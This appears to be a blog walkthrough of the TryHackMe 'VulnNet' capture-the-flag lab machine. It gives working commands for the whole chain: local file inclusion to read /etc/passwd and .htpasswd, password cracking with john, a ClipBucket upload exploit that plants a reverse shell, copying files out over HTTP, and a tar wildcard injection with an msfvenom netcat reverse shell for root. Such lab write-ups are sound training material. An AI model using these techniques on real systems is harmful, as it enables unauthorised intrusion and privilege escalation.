This is the oldest of the VulnNet boxes on Try Hack Me. It is also rated as a medium difficulty box.
If you have never used it before and would like some explaination, check out this post: Using AutoRecon
VulnNet Home Page:
- Looking through the nmap scans we find a domain name:
vulnnet.thmThis means we should update our
/etc/hostsfile on our local attack machine with a line that looks like:
<xx.xx.xx.xx> vulnnet.thm Replace the xx.xx.xx.xx wit hthe ip the vulnnet machine is assigned.
- If we look at the dirbuster/feroxbuster results we find 2 .js files.
Let’s examine these files for more clues.
In one file we find a reference to:
http://vulnnet.thm/index.php?referer= If we try
http://vulnnet.thm/index.php?referer=/etc/passwd the page just looks like normal, but if we view source on the page that is returned:
Looks like we have two ‘real’ users:
1 2 root:x:0:0:root:/root:/bin/bash server-management:x:1000:1000:server-management,,,:/home/server-management:/bin/bash
In the other .js file we find a reference to a subdomain:
broadcast.vulnnet.thm We should go back and add that to our line in
/etc/hosts for VulnNet:
<xx.xx.xx.xx> vulnnet.thm broadcast.vulnet.thm Replace the xx.xx.xx.xx wit hthe ip the vulnnet machine is assigned.
When we go to the site we see that it directs us to log in. Using burp we verify it is “basic auth”
Ok so now let’s go back to our LFI - (Local File Inclusion) and check for
Now lets see if we can view the .htpasswd file. We were able to retrieve a user hash. Let’s crack it with
So here is the command I used:
1 john --pot=cracked.pot --wordlist=/usr/share/wordlists/rockyou.txt hash
- I use the
johnsave any cracked passwords in that file, so I don’t forget to save them myself!
--wordlistis the location ofthe wordlist you wish to use. Your
rockyou.txtmight live in a different place than mine.
hashis just the name of the file I saved the hash we found in.
And now we login to Clip Bucket….what ever that is.
Let’s see if we can find out what version it is.
Let’s view the page source: And there it is: ClipBucket version 4.0
Let’s check searchsploit:
We can copy the exploit to our current location useing the
-m (mirror) flag.
searchsploit -m php/webapps/44250.txt
Reading through the exploit 44250.txt, it seems to imply that there is a /actions directory on the ClipBucket app. Let’s check it out….
So it looks like if we use this command:
1 sudo curl -F "email@example.com" -F "plupload=1" -F "name=shell.php" "http://broadcast.vulnnet.thm/actions/beats_uploader.php" -u developers:<PASSWORD>
We should be able to upload a reverse shell.
DON’T foget to set up your listener! :)
After the file is uploaded check the actions directory and there is a new folder:
CB_BEATS_UPLOAD_DIR the rev shell file will be in there.
First upgrade shell:
python3 -c "import pty;pty.spawn('/bin/bash')"
First run this to make sure your path and some others things are setup correctly in your shell:
1 export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp;export TERM=xterm-256color;alias ll='ls -lah --color=auto'
And I created a little one liner to get some quick info on the system.
1 echo '----------';which gcc;which cc;which python;which python3;which perl;echo '';which wget;which curl;which nc;echo '';whoami;id;echo '';file /bin/bash;echo '';uname -a;cat /etc/issue;cat /etc/*-release;echo '-----------'
Which gets you this:
Next I will use
wget to copy the
lse.sh script over to look for privesc options. Here is the github repo for LSE
We discover this file running LSE:
1 2 3 [!] fst190 Can we read any backup?......................................... yes! --- -rw-rw-r-- 1 server-management server-management 1484 Jan 24 2021 /var/backups/ssh-backup.tar.gz
I wasn’t able to extract the
tar file on the machine, so since we have python3 I fired up a python3 http server with:
python3 -m http.server 8000 to copy the file over.
Extracting the backup file gives us an
id_rsa file. But it is password protected.
ssh2john id_rsa > id_rsa.hash
and then use the
john to crack the newly created hash.
DON’T forget to
chmod 400 id_rsa
Now we can login through ssh with the
From this account running LSE reveals a cron running a file we have write access to. The script the cron runs is in
/var/opt/backupsrv.sh Examining that file reveals that is making a backup out of all the files in
/home/server-management/Documents using the “*” wildcard.
You can read about we can use this at gtfobins BTW that site should be on your speed dial!
There is also a great article about exploiting the wildcard HERE
On your local machine:
msfvenom -p cmd/unix/reverse_netcat lhost=<local-ip> lport=<desired-port> R to get your reverse shell. Start your listener!
On the target machine navigate to
1 2 3 4 echo "YOUR REVERSE SHELL FROM MSFVENOM HERE" > shell.sh chmod +x shell.sh echo "" > "--checkpoint-action=exec=sh shell.sh" echo "" > --checkpoint=1
And then wait for the cron to run. Your shell should pop up.
Go get that root flag!